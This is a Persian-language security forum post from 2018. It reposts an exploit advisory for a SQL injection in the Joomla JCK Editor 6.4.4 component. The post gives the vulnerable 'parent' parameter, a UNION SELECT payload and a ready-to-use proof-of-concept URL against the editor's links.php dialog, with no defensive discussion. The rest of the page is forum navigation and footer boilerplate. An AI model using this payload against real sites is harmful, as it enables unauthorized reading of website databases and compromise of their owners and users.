سایت با سیستم جدید رونمایی شد همزمان فعالیت سایت از سر گرفته شد...

JoomlaJckEditor6.4.4-sql

By C0d,
September 18, 2018 in ابزارهای امنیتی و آنالیز سیستم ها

Followers 0

Recommended Posts

C0d

Posted September 18, 2018

- Share

Posted September 18, 2018

Joomla JCK Editor 6.4.4 SQL Injection

# Title: Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection
# Date: 2018-09-14
# Exploit Author: Hamza Megahed
# Vendor Homepage:https://www.joomla.org/
# Download: https://arkextensions.com/products/jck-editor
# Version: 6.4.4
# Tested on: Ubuntu, FireFox,
# CVE: N/A

# Parameter = parent
# Payload = " UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa
# Poc:

Test = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa

Link to comment

Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in

Followers 0

Go to topic listing

Footer title

This content can be configured within your theme settings in your ACP. You can add any HTML including images, paragraphs and lists.

Footer title

This is an example of a list.

Footer title

This content can be configured within your theme settings in your ACP. You can add any HTML including images, paragraphs and lists.

Footer title

This content can be configured within your theme settings in your ACP. You can add any HTML including images, paragraphs and lists.

Sign In

JoomlaJckEditor6.4.4-sql

Recommended Posts

C0d

Link to comment

Share on other sites

Please sign in to comment

Footer title

Footer title

Footer title

Footer title

Browse

Activity